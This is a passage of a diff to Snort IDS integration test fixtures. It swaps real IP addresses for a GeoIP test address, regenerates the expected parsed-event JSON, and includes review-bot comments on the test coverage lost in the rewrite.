Backbone" + } + }, + "address": "175.16.199.1", + "ip": "175.16.199.1" }, "rule": { "description": "ICMP Packet", @@ -138,17 +157,34 @@ "id": "477" }, "source": { - "address": "172.25.212.245", - "ip": "172.25.212.245" + "geo": { + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", + "location": { + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" + } + }, + "address": "175.16.199.1", + "ip": "175.16.199.1" }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:pgNVNvJqM4JuAaqscZW8QapP0RY=", + "community_id": "1:ae//KI+huidgn9Nxeaibd8SUiVA=", "transport": "icmp", "type": "ipv4", - "direction": "internal" + "direction": "external" }, "observer": { "type": "ids", 
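Review bot: The expected `network.direction` for the `ICMP Packet` event flips from `internal` to `external` in this hunk, so after this change no event in the fast-log fixture appears to exercise the internal (private-to-private) direction branch that the old `172.25.212.245 -> 172.25.212.153` pair covered. The regenerated values are consistent with the new input, so the problem is in the input fixture rather than in this expected file. The removed lines show those RFC 1918 addresses produced no `geo`/`as` block, so they did not need to move into the supported GeoIP test range; keeping that pair for this one event, and using the supported address only where a geo lookup is actually asserted, would preserve the coverage. The `related.ip` list collapsing to a single entry further down is a symptom of the same source-equals-destination rewrite.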
@@ -161,14 +197,13 @@ }, "related": { "ip": [ - "172.25.212.245", - "172.25.212.153" + "175.16.199.1" ] }, "event": { "severity": 0, - "ingested": "2021-09-20T12:26:46.712458339Z", - "original": "05/30-19:09:10.917356 [**] [1:477:3] ICMP Packet [**] [Priority: 0] {ICMP} 172.25.212.245 -\u003e 172.25.212.153", + "ingested": "2021-12-09T13:44:49.150073400Z", + "original": "05/30-19:09:10.917356 [**] [1:477:3] ICMP Packet [**] [Priority: 0] {ICMP} 175.16.199.1 -\u003e 175.16.199.1", "timezone": "America/Chicago", "created": "2021-05-30T19:09:10.917-05:00", "kind": "alert", @@ -182,9 +217,26 @@ }, { "destination": { + "geo": { + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", + "location": { + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" + } + }, + "address": "175.16.199.1", "port": 1900, - "address": "239.255.255.250", - "ip": "239.255.255.250" + "ip": "175.16.199.1" }, "rule": { "description": "SCAN UPnP service discover attempt", @@ -201,7 +253,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:ljAAIPnv4XBxbFFvtvlYEM3fqjM=", + "community_id": "1:lTRw3g8ZdxItqss80+SSa07uVWc=", "transport": "tcp", "type": "ipv4", "direction": "outbound" 
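Review bot: Replacing the SSDP multicast destination `239.255.255.250:1900` with `175.16.199.1` removes the only multicast-destination case from the fast-log fixtures, and the `SCAN UPnP service discover attempt` event now asserts `geo`/`as` enrichment on a port-1900 flow that would not look like this on the wire. The removed lines show the multicast address produced no enrichment at all, so it was not one of the addresses that had to be moved into the supported GeoIP range. I would keep `239.255.255.250` in test-log-fast.log for this event and reserve `175.16.199.1` for the lines that genuinely exercise the geo lookup.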
@@ -218,13 +270,13 @@ "related": { "ip": [ "192.168.15.10", - "239.255.255.250" + "175.16.199.1" ] }, "event": { "severity": 3, - "ingested": "2021-09-20T12:26:46.712470808Z", - "original": "12/30-14:09:21.116402 [**] [1:1917:6] SCAN UPnP service discover attempt [**] [Classification: Detection of a Network Scan] [Priority: 3] {TCP} 192.168.15.10:1035 -\u003e 239.255.255.250:1900", + "ingested": "2021-12-09T13:44:49.150079300Z", + "original": "12/30-14:09:21.116402 [**] [1:1917:6] SCAN UPnP service discover attempt [**] [Classification: Detection of a Network Scan] [Priority: 3] {TCP} 192.168.15.10:1035 -\u003e 175.16.199.1:1900", "timezone": "America/Chicago", "created": "2021-12-30T14:09:21.116-06:00", "kind": "alert", @@ -250,29 +302,31 @@ }, "source": { "geo": { - "continent_name": "Europe", - "country_name": "Switzerland", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 8.1551, - "lat": 47.1449 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "CH" + "country_iso_code": "CN" }, "as": { - "number": 51852, + "number": 4837, "organization": { - "name": "Private Layer INC" + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "31.7.62.154", + "address": "175.16.199.1", "port": 80, - "ip": "31.7.62.154" + "ip": "175.16.199.1" }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:Szk4TjCqYPVVbo51bv6BPOdYxeU=", + "community_id": "1:qSaSgRpopkbN/a7ST5y66ztJl8U=", "transport": "tcp", "type": "ipv4", "direction": "inbound" 
@@ -288,14 +342,14 @@ }, "related": { "ip": [ - "31.7.62.154", + "175.16.199.1", "192.168.115.10" ] }, "event": { "severity": 3, - "ingested": "2021-09-20T12:26:46.712473968Z", - "original": "01/21-02:23:42.327730 [**] [1:2014520:2] ET INFO EXE - Served Attached HTTP [**] [Classification: Misc activity] [Priority: 3] {TCP} 31.7.62.154:80 -\u003e 192.168.115.10:1051", + "ingested": "2021-12-09T13:44:49.150085500Z", + "original": "01/21-02:23:42.327730 [**] [1:2014520:2] ET INFO EXE - Served Attached HTTP [**] [Classification: Misc activity] [Priority: 3] {TCP} 175.16.199.1:80 -\u003e 192.168.115.10:1051", "timezone": "America/Chicago", "created": "2021-01-21T02:23:42.327-06:00", "kind": "alert", @@ -320,28 +374,30 @@ }, "source": { "geo": { - "continent_name": "Europe", - "country_name": "Switzerland", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 8.1551, - "lat": 47.1449 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "CH" + "country_iso_code": "CN" }, "as": { - "number": 51852, + "number": 4837, "organization": { - "name": "Private Layer INC" + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "31.7.62.154", - "ip": "31.7.62.154" + "address": "175.16.199.1", + "ip": "175.16.199.1" }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:IRT4vxzCLjep4/T+6WX4EotOdB8=", + "community_id": "1:EtB/zlC1JmfdF0An9MzN1EDqn7o=", "transport": "icmp", "type": "ipv4", "direction": "inbound" 
@@ -357,14 +413,14 @@ }, "related": { "ip": [ - "31.7.62.154", + "175.16.199.1", "192.168.115.10" ] }, "event": { "severity": 3, - "ingested": "2021-09-20T12:26:46.712476882Z", - "original": "01/21-02:23:42.208605 [**] [1:408:5] ICMP Echo Reply [**] [Classification: Misc activity] [Priority: 3] {ICMP} 31.7.62.154 -\u003e 192.168.115.10", + "ingested": "2021-12-09T13:44:49.150092Z", + "original": "01/21-02:23:42.208605 [**] [1:408:5] ICMP Echo Reply [**] [Classification: Misc activity] [Priority: 3] {ICMP} 175.16.199.1 -\u003e 192.168.115.10", "timezone": "America/Chicago", "created": "2021-01-21T02:23:42.208-06:00", "kind": "alert", @@ -390,32 +446,31 @@ }, "source": { "geo": { - "continent_name": "Oceania", - "region_iso_code": "AU-SA", - "city_name": "Adelaide", - "country_iso_code": "AU", - "country_name": "Australia", - "region_name": "South Australia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 138.6005, - "lat": -34.9274 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 13335, + "number": 4837, "organization": { - "name": "Cloudflare, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "1.0.0.1", + "address": "175.16.199.1", "port": 53, - "ip": "1.0.0.1" + "ip": "175.16.199.1" }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:+tvY16hIcwIZMAvm9DAQbxgXahM=", + "community_id": "1:Rj/XwIFirLCUpBLJSDip5ZzpVZY=", "transport": "udp", "type": "ipv4", "direction": "inbound" 
@@ -431,14 +486,14 @@ }, "related": { "ip": [ - "1.0.0.1", + "175.16.199.1", "10.100.10.190" ] }, "event": { "severity": 1, - "ingested": "2021-09-20T12:26:46.712479720Z", - "original": "09/04-21:55:02.041364 [**] [1:1000005:0] UDP Connection [**] [Classification: A Network Trojan was Detected] [Priority: 1] {UDP} 1.0.0.1:53 -\u003e 10.100.10.190:54757", + "ingested": "2021-12-09T13:44:49.150098100Z", + "original": "09/04-21:55:02.041364 [**] [1:1000005:0] UDP Connection [**] [Classification: A Network Trojan was Detected] [Priority: 1] {UDP} 175.16.199.1:53 -\u003e 10.100.10.190:54757", "timezone": "America/Chicago", "created": "2021-09-04T21:55:02.041-05:00", "kind": "alert", @@ -464,32 +519,31 @@ }, "source": { "geo": { - "continent_name": "Oceania", - "region_iso_code": "AU-SA", - "city_name": "Adelaide", - "country_iso_code": "AU", - "country_name": "Australia", - "region_name": "South Australia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 138.6005, - "lat": -34.9274 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 13335, + "number": 4837, "organization": { - "name": "Cloudflare, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "1.0.0.1", + "address": "175.16.199.1", "port": 53, - "ip": "1.0.0.1" + "ip": "175.16.199.1" }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:8Jc3rXjFsCVhS+Lf9eKcoDQ3T9k=", + "community_id": "1:lFRQEVyjqFCLDyAOzC3sRuoFLkI=", "transport": "udp", "type": "ipv4", "direction": "inbound" 
@@ -505,14 +559,14 @@ }, "related": { "ip": [ - "1.0.0.1", + "175.16.199.1", "10.100.10.190" ] }, "event": { "severity": 1, - "ingested": "2021-09-20T12:26:46.712482551Z", - "original": "09/04-21:55:02.118427 [**] [1:1000005:0] UDP Connection [**] [Classification: A Network Trojan was Detected] [Priority: 1] {UDP} 1.0.0.1:53 -\u003e 10.100.10.190:36312", + "ingested": "2021-12-09T13:44:49.150103900Z", + "original": "09/04-21:55:02.118427 [**] [1:1000005:0] UDP Connection [**] [Classification: A Network Trojan was Detected] [Priority: 1] {UDP} 175.16.199.1:53 -\u003e 10.100.10.190:36312", "timezone": "America/Chicago", "created": "2021-09-04T21:55:02.118-05:00", "kind": "alert", @@ -527,22 +581,24 @@ { "destination": { "geo": { - "continent_name": "Oceania", - "country_name": "Australia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 143.2104, - "lat": -33.494 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "AU" + "country_iso_code": "CN" }, "as": { - "number": 13335, + "number": 4837, "organization": { - "name": "Cloudflare, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "1.1.1.1", - "ip": "1.1.1.1" + "address": "175.16.199.1", + "ip": "175.16.199.1" }, "rule": { "description": "Pinging...", @@ -558,7 +614,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:2tRzWxcmOEdEZgq/cv3/yeRD60Q=", + "community_id": "1:jEaJsIOzda45Q8FjN0LeZEATihA=", "transport": "icmp", "type": "ipv4", "direction": "outbound" 
@@ -575,13 +631,13 @@ "related": { "ip": [ "10.100.10.190", - "1.1.1.1" + "175.16.199.1" ] }, "event": { "severity": 2, - "ingested": "2021-09-20T12:26:46.712485352Z", - "original": "09/04-21:54:43.216486 [**] [1:1000004:0] Pinging... [**] [Classification: Attempted Information Leak] [Priority: 2] {ICMP} 10.100.10.190 -\u003e 1.1.1.1", + "ingested": "2021-12-09T13:44:49.150110Z", + "original": "09/04-21:54:43.216486 [**] [1:1000004:0] Pinging... [**] [Classification: Attempted Information Leak] [Priority: 2] {ICMP} 10.100.10.190 -\u003e 175.16.199.1", "timezone": "America/Chicago", "created": "2021-09-04T21:54:43.216-05:00", "kind": "alert", @@ -606,28 +662,30 @@ }, "source": { "geo": { - "continent_name": "Oceania", - "country_name": "Australia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 143.2104, - "lat": -33.494 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "AU" + "country_iso_code": "CN" }, "as": { - "number": 13335, + "number": 4837, "organization": { - "name": "Cloudflare, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "1.1.1.1", - "ip": "1.1.1.1" + "address": "175.16.199.1", + "ip": "175.16.199.1" }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:53l0pZVye5X9Nqti5cQB3Iiuohk=", + "community_id": "1:PsO7nB0G1KDZ1IDLocfXBmcxiaA=", "transport": "icmp", "type": "ipv4", "direction": "inbound" 
@@ -643,14 +701,14 @@ }, "related": { "ip": [ - "1.1.1.1", + "175.16.199.1", "10.100.10.190" ] }, "event": { "severity": 2, - "ingested": "2021-09-20T12:26:46.712488163Z", - "original": "09/04-21:54:43.227117 [**] [1:1000004:0] Pinging... [**] [Classification: Attempted Information Leak] [Priority: 2] {ICMP} 1.1.1.1 -\u003e 10.100.10.190", + "ingested": "2021-12-09T13:44:49.150116Z", + "original": "09/04-21:54:43.227117 [**] [1:1000004:0] Pinging... [**] [Classification: Attempted Information Leak] [Priority: 2] {ICMP} 175.16.199.1 -\u003e 10.100.10.190", "timezone": "America/Chicago", "created": "2021-09-04T21:54:43.227-05:00", "kind": "alert", diff --git a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-full.log b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-full.log index 6c33ce94827..be051dde040 100644 --- a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-full.log +++ b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-full.log @@ -18,7 +18,7 @@ Len: 55 [**] [1:1000004:0] Pinging... [**] [Classification: Attempted Information Leak] [Priority: 2] -09/04-21:53:15.299988 10.100.10.190 -> 172.217.1.142 +09/04-21:53:15.299988 10.100.10.190 -> 175.16.199.1 ICMP TTL:64 TOS:0x0 ID:6922 IpLen:20 DgmLen:84 DF Type:8 Code:0 ID:101 Seq:1 ECHO @@ -30,7 +30,7 @@ TCP TTL:127 TOS:0x0 ID:61472 IpLen:20 DgmLen:40 DF [**] [1:1000004:0] Pinging... [**] [Classification: Attempted Information Leak] [Priority: 2] -09/04-21:53:15.309468 172.217.1.142 -> 10.100.10.190 +09/04-21:53:15.309468 175.16.199.1 -> 10.100.10.190 ICMP TTL:114 TOS:0x0 ID:0 IpLen:20 DgmLen:84 Type:0 Code:0 ID:101 Seq:1 ECHO REPLY diff --git a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-full.log-expected.json b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-full.log-expected.json index c299ade79c5..ee6ae8b00df 100644 --- a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-full.log-expected.json 
+++ b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-full.log-expected.json @@ -42,7 +42,7 @@ }, "event": { "severity": 0, - "ingested": "2021-09-20T12:26:52.282202247Z", + "ingested": "2021-12-09T13:44:50.388577300Z", "original": "[**] [1:1000006:0] TCP connection [**]\n[Priority: 0] \n09/04-21:42:42.860730 10.100.20.59:57263 -\u003e 10.100.10.190:22\nTCP TTL:127 TOS:0x0 ID:53730 IpLen:20 DgmLen:108 DF\n***AP*** Seq: 0x688E00E4 Ack: 0xBC730BB6 Win: 0x80B TcpLen: 20\n", "timezone": "-05:00", "created": "2021-09-04T21:42:42.860-05:00", @@ -107,7 +107,7 @@ }, "event": { "severity": 0, - "ingested": "2021-09-20T12:26:52.282211291Z", + "ingested": "2021-12-09T13:44:50.388585300Z", "original": "[**] [1:1000006:0] TCP connection [**]\n[Priority: 0] \n09/04-21:42:42.903092 10.100.20.59:57263 -\u003e 10.100.10.190:22\nTCP TTL:127 TOS:0x0 ID:53731 IpLen:20 DgmLen:40 DF\n***A**** Seq: 0x688E0128 Ack: 0xBC730C02 Win: 0x80B TcpLen: 20\n", "timezone": "-05:00", "created": "2021-09-04T21:42:42.903-05:00", @@ -173,7 +173,7 @@ }, "event": { "severity": 1, - "ingested": "2021-09-20T12:26:52.282214398Z", + "ingested": "2021-12-09T13:44:50.388590600Z", "original": "[**] [1:1000005:0] UDP Connection [**]\n[Classification: A Network Trojan was Detected] [Priority: 1] \n09/04-21:53:15.299702 10.100.10.1:53 -\u003e 10.100.10.190:36635\nUDP TTL:64 TOS:0x0 ID:58363 IpLen:20 DgmLen:83\nLen: 55\n", "timezone": "-05:00", "created": "2021-09-04T21:53:15.299-05:00", 
@@ -201,22 +201,24 @@ { "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "US" + "country_iso_code": "CN" }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "172.217.1.142", - "ip": "172.217.1.142" + "address": "175.16.199.1", + "ip": "175.16.199.1" }, "rule": { "description": "Pinging...", @@ -232,7 +234,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:FJFO06B7BHGpiUKepnudtPM+Ht8=", + "community_id": "1:jEaJsIOzda45Q8FjN0LeZEATihA=", "transport": "icmp", "type": "ipv4", "direction": "outbound" @@ -249,13 +251,13 @@ "related": { "ip": [ "10.100.10.190", - "172.217.1.142" + "175.16.199.1" ] }, "event": { "severity": 2, - "ingested": "2021-09-20T12:26:52.282217306Z", - "original": "[**] [1:1000004:0] Pinging... [**]\n[Classification: Attempted Information Leak] [Priority: 2] \n09/04-21:53:15.299988 10.100.10.190 -\u003e 172.217.1.142\nICMP TTL:64 TOS:0x0 ID:6922 IpLen:20 DgmLen:84 DF\nType:8 Code:0 ID:101 Seq:1 ECHO\n", + "ingested": "2021-12-09T13:44:50.388595300Z", + "original": "[**] [1:1000004:0] Pinging... [**]\n[Classification: Attempted Information Leak] [Priority: 2] \n09/04-21:53:15.299988 10.100.10.190 -\u003e 175.16.199.1\nICMP TTL:64 TOS:0x0 ID:6922 IpLen:20 DgmLen:84 DF\nType:8 Code:0 ID:101 Seq:1 ECHO\n", "timezone": "-05:00", "created": "2021-09-04T21:53:15.299-05:00", "kind": "alert", 
@@ -326,7 +328,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-20T12:26:52.282220234Z", + "ingested": "2021-12-09T13:44:50.388633200Z", "original": "[**] [1:1000006:0] TCP connection [**]\n[Classification: Potentially Bad Traffic] [Priority: 2] \n09/04-21:53:15.301504 10.100.20.59:57263 -\u003e 10.100.10.190:22\nTCP TTL:127 TOS:0x0 ID:61472 IpLen:20 DgmLen:40 DF\n***A**** Seq: 0x68940D74 Ack: 0xBC811F16 Win: 0x80E TcpLen: 20\n", "timezone": "-05:00", "created": "2021-09-04T21:53:15.301-05:00", @@ -362,28 +364,30 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "US" + "country_iso_code": "CN" }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "172.217.1.142", - "ip": "172.217.1.142" + "address": "175.16.199.1", + "ip": "175.16.199.1" }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:IQDPFXUq/FFKt7MDyxeynVaxDb0=", + "community_id": "1:PsO7nB0G1KDZ1IDLocfXBmcxiaA=", "transport": "icmp", "type": "ipv4", "direction": "inbound" 
@@ -399,14 +403,14 @@ }, "related": { "ip": [ - "172.217.1.142", + "175.16.199.1", "10.100.10.190" ] }, "event": { "severity": 2, - "ingested": "2021-09-20T12:26:52.282223115Z", - "original": "[**] [1:1000004:0] Pinging... [**]\n[Classification: Attempted Information Leak] [Priority: 2] \n09/04-21:53:15.309468 172.217.1.142 -\u003e 10.100.10.190\nICMP TTL:114 TOS:0x0 ID:0 IpLen:20 DgmLen:84\nType:0 Code:0 ID:101 Seq:1 ECHO REPLY\n", + "ingested": "2021-12-09T13:44:50.388660400Z", + "original": "[**] [1:1000004:0] Pinging... [**]\n[Classification: Attempted Information Leak] [Priority: 2] \n09/04-21:53:15.309468 175.16.199.1 -\u003e 10.100.10.190\nICMP TTL:114 TOS:0x0 ID:0 IpLen:20 DgmLen:84\nType:0 Code:0 ID:101 Seq:1 ECHO REPLY\n", "timezone": "-05:00", "created": "2021-09-04T21:53:15.309-05:00", "kind": "alert", @@ -476,7 +480,7 @@ }, "event": { "severity": 1, - "ingested": "2021-09-20T12:26:52.282225933Z", + "ingested": "2021-12-09T13:44:50.388681Z", "original": "[**] [1:1000005:0] UDP Connection [**]\n[Classification: A Network Trojan was Detected] [Priority: 1] \n09/04-21:53:15.358155 10.100.10.1:53 -\u003e 10.100.10.190:56012\nUDP TTL:64 TOS:0x0 ID:33955 IpLen:20 DgmLen:153\nLen: 125", "timezone": "-05:00", "created": "2021-09-04T21:53:15.358-05:00", diff --git a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-pfsense.log b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-pfsense.log index b398727811c..ebe71dcd915 100644 --- a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-pfsense.log +++ b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-pfsense.log 
@@ -1,3 +1,3 @@ -09/03/21-12:37:16.428952 ,1,2403488,68499,"ET CINS Active Threat Intelligence Poor Reputation IP TCP group 95",TCP,89.248.168.157,36847,104.5.30.130,91,54321,Misc Attack,2,alert,Allow -09/03/21-12:56:44.310212 ,1,2011716,4,"ET SCAN Sipvicious User-Agent Detected (friendly-scanner)",UDP,193.46.255.221,5103,104.5.30.130,5060,54925,Attempted Information Leak,2,alert,Allow -09/03/21-16:29:03.494387 ,1,477,3,"ICMP Packet",ICMP,104.5.30.130,,104.5.30.1,,40546,,0,alert,Allow \ No newline at end of file +09/03/21-12:37:16.428952 ,1,2403488,68499,"ET CINS Active Threat Intelligence Poor Reputation IP TCP group 95",TCP,175.16.199.1,36847,175.16.199.1,91,54321,Misc Attack,2,alert,Allow +09/03/21-12:56:44.310212 ,1,2011716,4,"ET SCAN Sipvicious User-Agent Detected (friendly-scanner)",UDP,175.16.199.1,5103,175.16.199.1,5060,54925,Attempted Information Leak,2,alert,Allow +09/03/21-16:29:03.494387 ,1,477,3,"ICMP Packet",ICMP,175.16.199.1,,175.16.199.1,,40546,,0,alert,Allow \ No newline at end of file diff --git a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-pfsense.log-expected.json b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-pfsense.log-expected.json index ee45c9823af..a707d940347 100644 --- a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-pfsense.log-expected.json +++ b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-pfsense.log-expected.json 
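Review bot: All three rewritten rows now carry the same address in both the source and destination columns (`TCP,175.16.199.1,36847,175.16.199.1,91`, and likewise for the SIP and ICMP rows), so this fixture no longer checks that source and destination are parsed into distinct fields, and `related.ip` and `community_id` are now computed for a self-to-self flow. The original rows modelled an external scanner hitting a monitored host and, in the third row, a host pinging its gateway, which is the shape a pfSense/Snort deployment actually produces. Keep `175.16.199.1` on the side whose geo output is asserted and put a different address in the other column (a second address from the supported GeoIP test range, or a private one such as the `10.x` addresses the other fixtures already use when no geo output is needed on that side) so every row keeps source != destination.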
@@ -3,26 +3,25 @@ { "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-TX", - "city_name": "San Antonio", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Texas", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -98.437, - "lat": 29.6285 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 7018, + "number": 4837, "organization": { - "name": "AT\u0026T Services, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "104.5.30.130", + "address": "175.16.199.1", "port": 91, - "ip": "104.5.30.130" + "ip": "175.16.199.1" }, "rule": { "description": "ET CINS Active Threat Intelligence Poor Reputation IP TCP group 95", @@ -32,29 +31,31 @@ }, "source": { "geo": { - "continent_name": "Europe", - "country_name": "Netherlands", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 4.8995, - "lat": 52.3824 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "NL" + "country_iso_code": "CN" }, "as": { - "number": 202425, + "number": 4837, "organization": { - "name": "IP Volume inc" + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "89.248.168.157", + "address": "175.16.199.1", "port": 36847, - "ip": "89.248.168.157" + "ip": "175.16.199.1" }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:gP8zVsvHjM6/aBDhAEaqZYTtbec=", + "community_id": "1:QZjg2eWEv0AR1/Sfa6zE1x0jQIg=", "transport": "tcp", "type": "ipv4", "direction": "external" 
@@ -70,14 +71,13 @@ }, "related": { "ip": [ - "89.248.168.157", - "104.5.30.130" + "175.16.199.1" ] }, "event": { "severity": 2, - "ingested": "2021-09-20T12:26:55.088053208Z", - "original": "09/03/21-12:37:16.428952 ,1,2403488,68499,\"ET CINS Active Threat Intelligence Poor Reputation IP TCP group 95\",TCP,89.248.168.157,36847,104.5.30.130,91,54321,Misc Attack,2,alert,Allow", + "ingested": "2021-12-09T13:44:51.135040700Z", + "original": "09/03/21-12:37:16.428952 ,1,2403488,68499,\"ET CINS Active Threat Intelligence Poor Reputation IP TCP group 95\",TCP,175.16.199.1,36847,175.16.199.1,91,54321,Misc Attack,2,alert,Allow", "timezone": "America/Chicago", "created": "2021-01-04T12:37:16.428-06:00", "kind": "alert", @@ -98,26 +98,25 @@ { "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-TX", - "city_name": "San Antonio", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Texas", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -98.437, - "lat": 29.6285 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 7018, + "number": 4837, "organization": { - "name": "AT\u0026T Services, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "104.5.30.130", + "address": "175.16.199.1", "port": 5060, - "ip": "104.5.30.130" + "ip": "175.16.199.1" }, "rule": { "description": "ET SCAN Sipvicious User-Agent Detected (friendly-scanner)", 
@@ -127,29 +126,31 @@ }, "source": { "geo": { - "continent_name": "Europe", - "country_name": "United Kingdom", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -0.1224, - "lat": 51.4964 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "GB" + "country_iso_code": "CN" }, "as": { - "number": 35478, + "number": 4837, "organization": { - "name": "Bunea TELECOM SRL" + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "193.46.255.221", + "address": "175.16.199.1", "port": 5103, - "ip": "193.46.255.221" + "ip": "175.16.199.1" }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:T2S1O17uzHSgP2sKz5R4Hd/ipfs=", + "community_id": "1:dHh+jdcD2h6T0VDqCQgahOokJmk=", "transport": "udp", "type": "ipv4", "direction": "external" @@ -165,14 +166,13 @@ }, "related": { "ip": [ - "193.46.255.221", - "104.5.30.130" + "175.16.199.1" ] }, "event": { "severity": 2, - "ingested": "2021-09-20T12:26:55.088062194Z", - "original": "09/03/21-12:56:44.310212 ,1,2011716,4,\"ET SCAN Sipvicious User-Agent Detected (friendly-scanner)\",UDP,193.46.255.221,5103,104.5.30.130,5060,54925,Attempted Information Leak,2,alert,Allow", + "ingested": "2021-12-09T13:44:51.135050100Z", + "original": "09/03/21-12:56:44.310212 ,1,2011716,4,\"ET SCAN Sipvicious User-Agent Detected (friendly-scanner)\",UDP,175.16.199.1,5103,175.16.199.1,5060,54925,Attempted Information Leak,2,alert,Allow", "timezone": "America/Chicago", "created": "2021-01-04T12:56:44.310-06:00", "kind": "alert", 
@@ -193,25 +193,24 @@ { "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-TX", - "city_name": "San Antonio", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Texas", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -98.437, - "lat": 29.6285 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 7018, + "number": 4837, "organization": { - "name": "AT\u0026T Services, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "104.5.30.1", - "ip": "104.5.30.1" + "address": "175.16.199.1", + "ip": "175.16.199.1" }, "rule": { "description": "ICMP Packet", @@ -221,31 +220,30 @@ }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-TX", - "city_name": "San Antonio", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Texas", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -98.437, - "lat": 29.6285 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 7018, + "number": 4837, "organization": { - 